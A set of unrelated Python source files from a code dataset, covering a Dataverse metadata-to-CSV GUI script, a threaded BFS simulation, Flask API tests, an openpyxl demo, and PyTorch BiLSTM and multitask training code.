{"seq_id":"105700635","text":"# For each dataset listed in dataset_pids.txt, get terms of use and access metadata\n\nimport csv\nimport json\nimport glob\nimport os\nimport sys\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom tkinter import *\n\n# Create GUI for getting user input\n\n# Create, title and size the window\nwindow = Tk()\nwindow.title('Get terms of use and access metadata')\nwindow.geometry('550x250') # width x height\n\n\n# Function called when Browse button is pressed\ndef retrieve_jsondirectory():\n\tglobal jsonDirectory\n\n\t# Call the OS's file directory window and store selected object path as a global variable\n\tjsonDirectory = filedialog.askdirectory()\n\n\t# Show user which directory she chose\n\tlabel_showChosenDirectory = Label(window, text='You chose: ' + jsonDirectory, anchor='w', foreground='green')\n\tlabel_showChosenDirectory.grid(sticky='w', column=0, row=2)\n\n\n# Function called when Browse button is pressed\ndef retrieve_csvdirectory():\n\tglobal csvDirectory\n\n\t# Call the OS's file directory window and store selected object path as a global variable\n\tcsvDirectory = filedialog.askdirectory()\n\n\t# Show user which directory she chose\n\tlabel_showChosenDirectory = Label(window, text='You chose: ' + csvDirectory, anchor='w', foreground='green')\n\tlabel_showChosenDirectory.grid(sticky='w', column=0, row=6)\n\n\n# Function called when Browse button is pressed\ndef start():\n\twindow.destroy()\n\n\n# Create label for button to browse for directory containing JSON files\nlabel_getJSONFiles = Label(window, text='Choose folder containing the JSON files:', anchor='w')\nlabel_getJSONFiles.grid(sticky='w', column=0, row=0, pady=2)\n\n# Create button to browse for directory containing JSON files\nbutton_getJSONFiles = ttk.Button(window, text='Browse', command=lambda: retrieve_jsondirectory())\nbutton_getJSONFiles.grid(sticky='w', column=0, row=1)\n\n# Create empty row in grid to improve spacing between the two fields\nwindow.grid_rowconfigure(3, minsize=25)\n\n# Create label for button to browse for directory to add csv files in\nlabel_tablesDirectory = Label(window, text='Choose folder to store the csv files:', anchor='w')\nlabel_tablesDirectory.grid(sticky='w', column=0, row=4, pady=2)\n\n# Create button to browse for directory containing JSON files\nbutton_tablesDirectory = ttk.Button(window, text='Browse', command=lambda: retrieve_csvdirectory())\nbutton_tablesDirectory.grid(sticky='w', column=0, row=5)\n\n# Create start button\nbutton_Start = ttk.Button(window, text='Start', command=lambda: start())\nbutton_Start.grid(sticky='w', column=0, row=7, pady=40)\n\n# Keep window open until it's closed\nmainloop()\n\n\n# Store path of csv file to filename variable\nfilename = os.path.join(csvDirectory, 'terms.csv')\n\nprint('Creating CSV file')\n\nwith open(filename, mode='w') as metadatafile:\n\tmetadatafile = csv.writer(metadatafile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t# Create header row\n\tmetadatafile.writerow([\n\t\t'dataset_id', 'persistentUrl', 'license', 'termsOfUse', 'confidentialityDeclaration',\n\t\t'specialPermissions', 'restrictions', 'citationRequirements', 'depositorRequirements',\n\t\t'conditions', 'disclaimer', 'termsOfAccess', 'dataaccessPlace', 'originalArchive',\n\t\t'availabilityStatus', 'contactForAccess', 
'sizeOfCollection', 'studyCompletion'])\n\nprint('Getting metadata:')\n\n\n# Get value of nested key or return nothing if key doesn't exist\ndef improved_get(_dict, path, default=None):\n\tfor key in path.split('.'):\n\t\ttry:\n\t\t\t_dict = _dict[key]\n\t\texcept KeyError:\n\t\t\treturn default\n\treturn _dict\n\n\nfor file in glob.glob(os.path.join(jsonDirectory, '*.json')): # For each JSON file in a folder\n\twith open(file, 'r') as f1: # Open each file in read mode\n\t\tdataset_metadata = f1.read() # Copy content to dataset_metadata variable\n\t\tdataset_metadata = json.loads(dataset_metadata) # Load content in variable as a json object\n\n\t# Save the metadata values in variables\n\tdataset_id = dataset_metadata['data']['id']\n\tpersistentUrl = dataset_metadata['data']['persistentUrl']\n\tlicense = improved_get(dataset_metadata, 'data.latestVersion.license')\n\ttermsOfUse = improved_get(dataset_metadata, 'data.latestVersion.termsOfUse')\n\tconfidentialityDeclaration = improved_get(dataset_metadata, 'data.latestVersion.confidentialityDeclaration')\n\tspecialPermissions = improved_get(dataset_metadata, 'data.latestVersion.specialPermissions')\n\trestrictions = improved_get(dataset_metadata, 'data.latestVersion.restrictions')\n\tcitationRequirements = improved_get(dataset_metadata, 'data.latestVersion.citationRequirements')\n\tdepositorRequirements = improved_get(dataset_metadata, 'data.latestVersion.depositorRequirements')\n\tconditions = improved_get(dataset_metadata, 'data.latestVersion.conditions')\n\tdisclaimer = improved_get(dataset_metadata, 'data.latestVersion.disclaimer')\n\ttermsOfAccess = improved_get(dataset_metadata, 'data.latestVersion.termsOfAccess')\n\tdataaccessPlace = improved_get(dataset_metadata, 'data.latestVersion.dataaccessPlace')\n\toriginalArchive = improved_get(dataset_metadata, 'data.latestVersion.originalArchive')\n\tavailabilityStatus = improved_get(dataset_metadata, 'data.latestVersion.availabilityStatus')\n\tcontactForAccess = improved_get(dataset_metadata, 'data.latestVersion.contactForAccess')\n\tsizeOfCollection = improved_get(dataset_metadata, 'data.latestVersion.sizeOfCollection')\n\tstudyCompletion = improved_get(dataset_metadata, 'data.latestVersion.studyCompletion')\n\n\t# Append fields to the csv file\n\twith open(filename, mode='a') as metadatafile:\n\n\t\t# Convert all characters to utf-8\n\t\tdef to_utf8(lst):\n\t\t\treturn [str(elem).encode('utf-8') for elem in lst]\n\n\t\tmetadatafile = csv.writer(metadatafile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n\t\t# Write new row\n\t\tmetadatafile.writerow([\n\t\t\tdataset_id, persistentUrl, license, termsOfUse, confidentialityDeclaration,\n\t\t\tspecialPermissions, restrictions, citationRequirements, depositorRequirements,\n\t\t\tconditions, disclaimer, termsOfAccess, dataaccessPlace, originalArchive,\n\t\t\tavailabilityStatus, contactForAccess, sizeOfCollection, studyCompletion])\n\n\t# As a progress indicator, print a dot each time a row is written\n\tsys.stdout.write('.')\n\tsys.stdout.flush()\nprint('\\n')\n","sub_path":"get-dataverse-metadata/parse_metadata_fields/parse_terms_metadata.py","file_name":"parse_terms_metadata.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"227698804","text":"from queue import Queue\nfrom message import Message\nfrom process import Process\nimport threading\nimport time\nimport sys\nimport json\n\ndef launch_master_thread(n, ids, root, 
conn_matrix):\n global id_process, id_label\n i=0\n for p_id in ids:\n id_label[p_id] = i\n i += 1\n print(f'In master thread. Launching {n} threads..')\n initial_config = {}\n q = [] #list of communication channels\n for i in range(n):\n q.append(Queue()) #append comm channel for each process\n q.append(Queue()) # last comm channel to communicate with master\n for pid in ids:\n initial_config[int(pid)] = {'parent': None,\n 'children':[],\n 'marked':False,\n 'sent':[],\n 'r':0,\n 'my_index':id_label[int(pid)], #to know which queue belongs to me from the array q\n }\n initial_config['comm']=q\n threadLock = threading.Lock()\n r=1\n cleanup = False\n while True:\n print(f'********** master broadcast {r} ***********')\n if r==1:\n config = initial_config\n latest_q = q[-1]\n print(f'|| BFS LEVEL: {root}')\n r = r+1\n id_process = launch_threads(ids, conn_matrix, root, config)\n config={}\n done_threads=[]\n while True: #wait for all threads to complete one round after the first broadcast\n if len(done_threads) == len(id_process):\n break\n tmp=None\n threadLock.acquire()\n if latest_q.qsize()!=0:\n tmp = latest_q.get()\n threadLock.release()\n if tmp==None:\n continue\n else: #if tmp.receiverID == 'Master':\n config[tmp.senderID] = tmp.msg_type['done_msg'] \n config['comm'] = tmp.msg_type['comm']\n latest_q = tmp.msg_type['comm'][-1]\n done_threads.append(tmp.senderID)\n for v in id_process.values():\n v.join()\n # check termination\n visited = []\n for key in config.keys():\n if key!=\"comm\":\n if config[key]['marked']==True:\n visited.append(key)\n if len(visited)==n:\n if not cleanup:\n cleanup=True\n else:\n break\n print('**********************************************')\n for c in config:\n if c!=\"comm\":\n print(f'{c} : Parent: {config[c][\"parent\"]} Children: {config[c][\"children\"]} Marked: {config[c][\"marked\"]}')\n print('exiting master thread. 
bye!')\n\ndef launch_threads(ids, conn_matrix, root, config):\n    for p_id, conn in zip(ids, conn_matrix):\n        process = Process(int(p_id), root, conn, config)\n        id_process[p_id] = process \n    for v in id_process.values():\n        v.start()\n    return id_process\n\nif __name__==\"__main__\":\n    with open(\"input_basic.dat\",\"r\") as dat_file:\n        data = dat_file.readlines()\n    n = int(data[0])\n    root = int(data[2])\n    ids = data[1].strip()[1:-1].split(\",\")\n    for i in range(len(ids)): ids[i] = int(ids[i])\n    matrix_rows = data[3][2:-3].split(\"],[\")\n    connectivity_matrix = []\n    for row in matrix_rows:\n        connectivity_matrix.append(row.split(\",\"))\n    for row in range(len(connectivity_matrix)):\n        for j in range(len(connectivity_matrix)):\n            connectivity_matrix[row][j] = int(connectivity_matrix[row][j])\n    id_process = {}\n    id_label = {} \n    master_thread = threading.Thread(name='master',target=launch_master_thread, args=(n, ids, root, connectivity_matrix))\n    master_thread.start() \n\n\n\n","sub_path":"v5_multichannel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"156678058","text":"lista = []\n\nfor x in range(0, 101):\n    lista.append(x)\n\nprint(lista)\n\n# list comprehension: nearly the same result as the instructions above (note: range(0, 100) stops at 99, while the loop above uses range(0, 101))\nestructura = [x for x in range(0, 100)]\nprint(estructura)\n\n# tuple comprehension\n# inside a comprehension we can also call functions\nestructura = tuple( (x for x in range(0, 100) if x % 2 == 0) )\nprint(estructura)\n\ndiccionario = { indice:valor for indice, valor in enumerate(estructura) }\nprint(diccionario)","sub_path":"cf_profesional_python/extras/comprehension.py","file_name":"comprehension.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"44422482","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom app import app\nfrom models import setup_db, Artist, Client, Project, db_drop_and_create_all\nfrom config import artist_token, client_token\n\n\n# Creating request headers with 'Authorization' key and access token as value\nartist_auth_header = {\n    'Authorization': artist_token\n}\n\nclient_auth_header = {\n    'Authorization': client_token\n}\n\n\nclass TestCase(unittest.TestCase):\n\n    def setUp(self):\n        \"\"\"Set up of the test\"\"\"\n        self.app = app\n        self.client = self.app.test_client\n        self.database_name = \"nomadic\"\n        self.database_path = \"postgres://{}/{}\".format(\n            'localhost:5432', self.database_name)\n        setup_db(self.app, self.database_path)\n        db_drop_and_create_all()\n\n        # binds the app to the current context\n        with self.app.app_context():\n            self.db = SQLAlchemy()\n            self.db.init_app(self.app)\n            # create all tables\n            self.db.create_all()\n\n    def tearDown(self):\n        \"\"\"Executed after each test\"\"\"\n        pass\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /projects\n# ----------------------------------------------------------------------------#\n    def test_get_project_names_unauthorized(self):\n        res = self.client().get('/projects')\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 401)\n        self.assertFalse(data['success'])\n\n    def test_get_project_names_artists(self):\n        res = self.client().get('/projects', headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 200)\n        
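# the JSON body should flag success and list at least one project (descriptive comment added)\n        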
self.assertTrue(data['success'])\n self.assertGreater(len(data['projects']), 0)\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /artists\n# ----------------------------------------------------------------------------#\n def test_get_all_artists_unauthorized(self):\n res = self.client().get('/artists')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n def test_get_all_artists_artists(self):\n res = self.client().get('/artists', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertGreater(len(data['artists']), 0)\n\n\n# ----------------------------------------------------------------------------#\n# Tests for GET /project/\n# ----------------------------------------------------------------------------#\n def test_get_project_detail_404(self):\n res = self.client().get('/projects/10', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n\n def test_get_project_detail(self):\n res = self.client().get('/projects/1', headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'].get('id'), 1)\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /clients\n# ----------------------------------------------------------------------------#\n def test_create_new_client(self):\n client = {\n 'name': 'Nomadic',\n 'description': 'A platfor that connects artists and art projects'\n }\n\n res = self.client().post('/clients', json=client,\n headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['client'], 'Nomadic')\n\n def test_create_new_client_no_json(self):\n res = self.client().post('/clients', headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n def test_create_new_client_by_artist(self):\n client = {\n 'name': 'Udacity',\n 'description': 'An online learning platform'\n }\n\n res = self.client().post('/clients', json=client,\n headers=artist_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 401)\n self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /projects\n# ----------------------------------------------------------------------------#\n def test_create_new_project(self):\n\n project = {\n 'name': 'Fyyur office wall painting',\n 'client_id': 1,\n 'description': 'Paint a large wall in the Fyyur office'\n }\n res = self.client().post('/projects', json=project,\n headers=client_auth_header)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['success'])\n self.assertEqual(data['project'].get('name'),\n 'Fyyur office wall painting')\n\n def test_create_new_project_no_json(self):\n res = self.client().post('/projects', headers=client_auth_header)\n data = json.loads(res.data)\n \n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n\n def test_create_new_project_unauthorized(self):\n project = {\n 'name': 'Fyyur office wall painting',\n 'client_id': 1,\n 'description': 'Paint a large wall in the 
Fyyur office'\n        }\n        res = self.client().post('/projects', json=project,\n                                 headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 401)\n        self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for POST /artists\n# ----------------------------------------------------------------------------#\n    def test_create_new_artist(self):\n\n        artist = {\n            'name': 'Veneer',\n            'portfolio_link': 'http://dribble.com'\n        }\n        res = self.client().post('/artists', json=artist,\n                                 headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 200)\n        self.assertTrue(data['success'])\n        self.assertEqual(data['artist'].get('name'),\n                         'Veneer')\n\n    def test_create_new_artist_no_json(self):\n        res = self.client().post('/artists', headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 422)\n        self.assertFalse(data['success'])\n\n    def test_create_new_artist_no_portfolio(self):\n        artist = {\n            'name': 'Vaneer'\n        }\n        res = self.client().post('/artists', json=artist,\n                                 headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 422)\n        self.assertFalse(data['success'])\n\n# ----------------------------------------------------------------------------#\n# Tests for PATCH /project/\n# ----------------------------------------------------------------------------#\n    def test_edit_project_detail_404(self):\n        project_edit = {\n            'name': 'Fyuur webpage background'\n        }\n        res = self.client().patch('/projects/10', json=project_edit,\n                                  headers=client_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 404)\n        self.assertFalse(data['success'])\n\n    def test_edit_project_detail(self):\n        res = self.client().get('/projects/1', headers=client_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(data['project'].get('name'),\n                         'Fyyur website background')\n\n        project_edit = {\n            'name': 'Fyyur webpage background'\n        }\n        \n        res = self.client().patch('/projects/1', json=project_edit,\n                                  headers=client_auth_header)\n        data = json.loads(res.data)\n        self.assertEqual(res.status_code, 200)\n        self.assertTrue(data['success'])\n        self.assertEqual(data['project'].get('name'),\n                         'Fyyur webpage background')\n\n# ----------------------------------------------------------------------------#\n# Tests for DELETE /projects/\n# ----------------------------------------------------------------------------#\n    def test_delete_project_unauthorized(self):\n        res = self.client().delete('/projects/1', headers=artist_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 401)\n        self.assertFalse(data['success'])\n\n    def test_delete_project(self):\n        res = self.client().delete('/projects/1', headers=client_auth_header)\n        data = json.loads(res.data)\n\n        self.assertEqual(res.status_code, 200)\n        self.assertTrue(data['success'])\n        self.assertEqual(data['project'], 'Fyyur website background')\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":9466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"398586716","text":"import argparse\nimport json\nimport logging\nfrom re import sub\n\ndef _read_config(args):\n    config_filename = 'ingest.conf'\n    config = {}\n\n    if args.config is not None:\n        config_filename = args.config\n\n    
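# report which configuration file is about to be parsed (descriptive comment added)\n    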
logging.info('Reading configuration file (' + config_filename + ') ...')\n\n with open(config_filename, 'r') as config_file:\n for line in config_file.read().splitlines():\n if not line.startswith('#'):\n prop = line.split('=')\n if len(prop) == 2:\n config[prop[0].strip()] = prop[1].strip()\n\n if ('env' in args) and (args.env is not None):\n config['env'] = args.env.upper()\n else:\n config['env'] = 'PUBLIC_AND_ENTERPRISE'\n\n if ('sonar_server' in args) and (args.sonar_server is not None):\n config['sonar_server'] = args.sonar_server\n if ('install_sonar_server' in args) and (args.install_sonar_server is not None):\n config['install_sonar_server'] = args.install_sonar_server\n if ('install_sonar_runner' in args) and (args.install_sonar_server is not None):\n config['install_sonar_runner'] = args.install_sonar_runner\n\n _convert_public_orgs(config)\n _convert_sonar_metrics(config)\n\n return config\n\ndef _write_update(args):\n\n if not args.update:\n file_or_es = 'results.out'\n else:\n file_or_es = args.update\n return file_or_es\n\n\ndef _parse_commandline():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-config', '--config',\n help='the config file to use for the program [default: ingest.conf]')\n\n parser.add_argument('-env', '--env',\n help='the config file to use for the program [default: ingest.conf]')\n\n parser.add_argument('-update', '--update',\n help='dependencies result will either be written to a file or ES will be updated [default: results.out]',\n action='store_true')\n parser.add_argument('-sonar_server', '--sonar_server',\n help='determine to communicate either local or remote sonar server [default: local]',\n action='store_true')\n parser.add_argument('-install_sonar_server', '--install_sonar_server',\n help='determine to install sonar server [default: false]',\n action='store_true')\n parser.add_argument('-install_sonar_runner', '--install_sonar_runner',\n help='determine to install sonar runner [default: false]',\n action='store_true')\n\n return parser.parse_args()\n\n\ndef _convert_public_orgs(config):\n orgs = []\n for org in config['public_orgs'].split(','):\n orgs.append(org.strip())\n config['public_orgs'] = orgs\n\ndef _convert_sonar_metrics(config):\n metrics = []\n for metric in config['sonar_health_metrics'].split(','):\n metrics.append(metric.strip())\n config['sonar_health_metrics'] = metrics\n\ndef main(args):\n config_update = {}\n logging.basicConfig(filename='project_dependency.log', level=logging.INFO)\n config_update['config'] = _read_config(args)\n config_update['update'] = _write_update(args)\n return config_update\n","sub_path":"ingress/github/sonar/configparams.py","file_name":"configparams.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"43993450","text":"import datetime\nfrom openpyxl import Workbook\n\nwb=Workbook()\nws=wb.active\n# set date using a Python datetime\nws['A1']=datetime.datetime(2010,7,10)\nprint(ws['A1'].number_format)\n\n# enable type inerence on a case-by-case basis\nwb.guess_types=True\nws['B1']='3.14%'\nprint(ws['B1'].value)\nprint(ws['B1'].number_format)\nwb.guess_types=False\nprint(ws['B1'].value)\nprint(ws['B1'].number_format)\n\n# using formula\nws['C1']='=SUM(1,1)'\n\n# merge/unmerge cells\nws.merge_cells('A3:D3')\nws.merge_cells('A4:D4')\nws.unmerge_cells('A4:D4')\n# or\nws.merge_cells(start_row=6, start_column=1, end_row=6, end_column=7)\n\n# insert an image\nfrom openpyxl.drawing.image import 
Image\n\nws['A7']='You should see threelogos below'\nimg=Image('cell.png')\nws.add_image(img,'A1')\n\n# fold\n\nimport openpyxl\nws5=wb.create_sheet()\nws.column_dimensions.group('G','H',hidden=True)\n\nwb.save('3_formula.xlsx')","sub_path":"3_usingNumberFormats.py","file_name":"3_usingNumberFormats.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406118812","text":"import numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.nn.utils.rnn import pad_packed_sequence\nfrom torch.nn import Parameter\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\ntorch.manual_seed(123)\ntorch.cuda.manual_seed(0)\n\nclass BiLSTM(nn.Module):\n def __init__(self, emb, emb_pos, args):\n super(BiLSTM, self).__init__()\n self.num_words = emb.shape[0]\n self.embed_size = emb.shape[1]\n self.num_pos_tags = len(args.pos2idx) + 2 # add one for , one for \n self.hid_size = args.hid\n self.num_layers = args.num_layers\n self.num_classes = len(args.label_to_id)\n self.num_causal = args.num_causal\n self.dropout = args.dropout\n self.attention = args.attention\n self.bert = args.bert_fts\n self.sparse=args.sparse_emb\n \n ### embedding layer\n if self.bert:\n self.embed_size = args.bert_dim\n else:\n self.emb = nn.Embedding(self.num_words, self.embed_size, padding_idx=0, sparse=self.sparse)\n self.emb.weight = Parameter(torch.FloatTensor(emb))\n self.emb.weight.requires_grad = False\n \n ### pos embeddinig -- one-hot vector\n self.emb_pos = nn.Embedding(self.num_pos_tags, self.num_pos_tags, padding_idx=37, sparse=self.sparse)\n self.emb_pos.weight = Parameter(torch.FloatTensor(emb_pos))\n self.emb_pos.weight.requires_grad = args.train_pos_emb\n\n ### RNN layer\n self.lstm = nn.LSTM(self.embed_size+self.num_pos_tags, self.hid_size,\n self.num_layers, bidirectional=True, batch_first=True)\n \n self.usefeature = args.usefeature\n if self.usefeature:\n self.linear1 = nn.Linear(self.hid_size*4+args.n_fts, self.hid_size)\n else:\n self.linear1 = nn.Linear(self.hid_size*4, self.hid_size)\n self.linear2 = nn.Linear(self.hid_size, self.num_classes)\n self.linear_c = nn.Linear(self.hid_size, self.num_causal) \n self.linear_attn = nn.Linear(self.hid_size, self.hid_size)\n\n self.dropout = nn.Dropout(p=args.dropout)\n self.softmax = nn.Softmax(dim=1)\n self.act = nn.Tanh()\n \n def cal_weights(self, tar_vec, all_vec):\n # tar_vec: batch_size * hid_size\n # all_vec: batch_size * sent_len * hid_size\n # output: weights: batch_size * sent_len \n batch_size = all_vec.size()[0]\n sent_len = all_vec.size()[1]\n tar_tensor = tar_vec.unsqueeze(1)\n all_vec = self.linear_attn(all_vec.view(batch_size*sent_len, -1)).view(batch_size, sent_len, -1)\n distance = \"cosine_sim\"\n if distance == \"cosine_sim\":\n sims = torch.nn.functional.cosine_similarity(tar_tensor.repeat(1, sent_len, 1), all_vec, dim = 2)\n attns = self.softmax(sims)\n else:\n sims = tar_tensor.bmm(all_vec.transpose(1, 2)).squeeze(1)\n attns = self.softmax(sims)\n return attns\n\n def attention_weighting(self, ltar_f, ltar_b, rtar_f, rtar_b, out):\n # input: original target hidden vectors\n # output: weighted vectors by attention\n sent_len = out.size()[1]\n batch_size = out.size()[0]\n\n all_f = out[:, :, :self.hid_size]\n all_b = out[:, :, self.hid_size:]\n w_ltar_f = self.cal_weights(ltar_f, all_f).unsqueeze(2)\n w_ltar_b = 
self.cal_weights(ltar_b, all_b).unsqueeze(2)\n w_rtar_f = self.cal_weights(rtar_f, all_f).unsqueeze(2)\n w_rtar_b = self.cal_weights(rtar_b, all_b).unsqueeze(2)\n # compute weighted sum\n ltar_f = torch.sum(w_ltar_f.repeat(1, 1, self.hid_size) * all_f, dim=1)\n ltar_b = torch.sum(w_ltar_b.repeat(1, 1, self.hid_size) * all_b, dim=1)\n rtar_f = torch.sum(w_rtar_f.repeat(1, 1, self.hid_size) * all_f, dim=1)\n rtar_b = torch.sum(w_rtar_b.repeat(1, 1, self.hid_size) * all_b, dim=1)\n return ltar_f, ltar_b, rtar_f, rtar_b\n\n def forward(self, seq_lens, sent, lidx_start, lidx_end, ridx_start, ridx_end, \n pred_inds=[], flip = False, causal = False, vat=False):\n '''\n sent[0]: the input sentence (represent in index) in shape (batch_size, seq_len)\n sent[1]: the input POS tage (represent in index) in shape (batch_size, seq_len)\n sent[2]: the linguistic features in shape (batch, n_fts)\n seq_lens: the sequence length for each batch e.g.: [8,4,3,...]\n idx_start/end: a batch of index that assign which element to take. [5, 3, 2, 8,...] \n '''\n\n # look up the embedding for sencetences\n # if in VAT training, simply pass in the noisy input\n if vat:\n emb = sent[0]\n elif self.bert:\n emb = self.dropout(sent[0])\n else:\n emb = self.dropout(self.emb(sent[0]))\n \n # create embeddings for pos tags\n pos = self.emb_pos(sent[1])\n # pack and pass to lstm module and then pad again\n inputs = torch.cat((emb, pos), dim=2)\n pack_inputs = pack_padded_sequence(inputs, seq_lens, batch_first=True, enforce_sorted=False)\n self.lstm.flatten_parameters()\n out, _ = self.lstm(pack_inputs)\n out, seq_lens = pad_packed_sequence(out, batch_first=True, padding_value=0.0) # (batch, seq_len, 2*hid_size)\n \n ### obtain hidden vars based on start and end idx \n batch_size = len(seq_lens)\n lidx_e_idx = lidx_end.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1) # (batch, 1, 2*hid_size)\n ltar_f = torch.gather(out, dim=1, index=lidx_e_idx).squeeze(1)[:,self.hid_size:]\n lidx_s_idx = lidx_start.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n ltar_b = torch.gather(out, dim=1, index=lidx_s_idx).squeeze(1)[:,:self.hid_size]\n ridx_e_idx = ridx_end.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n rtar_f = torch.gather(out, dim=1, index=ridx_e_idx).squeeze(1)[:,self.hid_size:]\n ridx_s_idx = ridx_start.unsqueeze(1).expand((out.size(0), out.size(2))).unsqueeze(1)\n rtar_b = torch.gather(out, dim=1, index=ridx_s_idx).squeeze(1)[:,:self.hid_size]\n \n if self.attention:\n ltar_f, ltar_b, rtar_f, rtar_b = self.attention_weighting(ltar_f, ltar_b, rtar_f, rtar_b, out)\n\n if flip:\n tar = self.dropout(torch.cat((rtar_f, rtar_b, ltar_f, ltar_b), dim=1))\n else:\n tar = self.dropout(torch.cat((ltar_f, ltar_b, rtar_f, rtar_b), dim=1))\n\n if self.usefeature:\n out = torch.cat((tar, sent[2]), dim=1)\n else:\n out = tar\n \n # linear prediction\n out = self.linear1(out)\n out = self.act(out)\n out = self.dropout(out)\n # causal relation \n if causal:\n out = self.linear_c(out)\n else:\n out = self.linear2(out)\n prob = self.softmax(out) # batch x num_labels\n return out, prob\n","sub_path":"code/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":7100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"152732127","text":"#!/usr/bin/env python3\n\nimport sys\nfrom pokemon.game import Game\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n raise Exception('Not enough arguments')\n team_1, team_2 = sys.argv[1:]\n new_game 
= Game.create_game(team_1, team_2)\n    new_game.run()\n","sub_path":"run_simulator.py","file_name":"run_simulator.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"575408911","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\nfrom dataset.data_loader import get_loader\nfrom model.dcnet import DeepCollaborationNetwork, MultiTaskCriterion\nfrom trainer.Trainer import Trainer\n\n\nclass MultitaskTrainer(Trainer):\n    def __init__(self, batch_size=32, lr=0.01, epoch_lr=None, lr_decay=0.,\n                 weight_decay=0., n_classes=23, pretrained=True):\n\n        super().__init__(batch_size, lr, epoch_lr, lr_decay, weight_decay, n_classes, pretrained)\n\n    def create_model(self, model_name):\n        criterions = [nn.CrossEntropyLoss(), nn.L1Loss()]\n        weights = [1, 0.10]\n        self.criterion = MultiTaskCriterion(criterions, weights)\n\n        self.net = DeepCollaborationNetwork(model_name, self.dims, pretrained=self.pretrained)\n        self.net.cuda()\n\n        self.freeze_layers(1)\n\n        self.optimizer = optim.Adam(self._get_parameters(), lr=self.start_lr, weight_decay=self.weight_decay)\n\n    def freeze_layers(self, n):\n        for column in self.net.columns:\n            for i in range(n):\n                for param in column[i].parameters():\n                    param.requires_grad = False\n\n    def get_loader(self, folder):\n        loader, _ = get_loader(folder['train']['files'], folder['train']['labels'], self.batch_size)\n        loader.dataset.set_multitask()\n        return loader\n\n    def create_mini_batch(self, batch_loader):\n        batch = next(batch_loader)[1]\n        final_targets = [Variable(batch[1].type(torch.LongTensor)).cuda(),\n                         Variable(batch[2].type(torch.FloatTensor)).cuda()]\n        return Variable(batch[0]).cuda(), final_targets\n\n    def get_class_predictions(self, output, targets):\n        return output[0].max(1)[1].type_as(targets[0])\n\n    def update_iteration_info(self, batch_input, output, targets, epoch_acc, loader, loss, j, print_info=True):\n        batch_size = batch_input.size(0)\n        predictions = self.get_class_predictions(output, targets)\n        correct = predictions.eq(targets[0])\n        if not hasattr(correct, 'sum'):\n            correct = correct.cpu()\n        correct = correct.sum()\n        acc = 100. * correct.data.item() / batch_size\n        epoch_acc.append(acc)\n        if print_info:\n            print('\\r', end='')\n            print('{} / {} - {:.4f} - {:.2f}%'.format(j + 1, len(loader), loss.data.item(), acc), end='',\n                  flush=True)\n\n        return 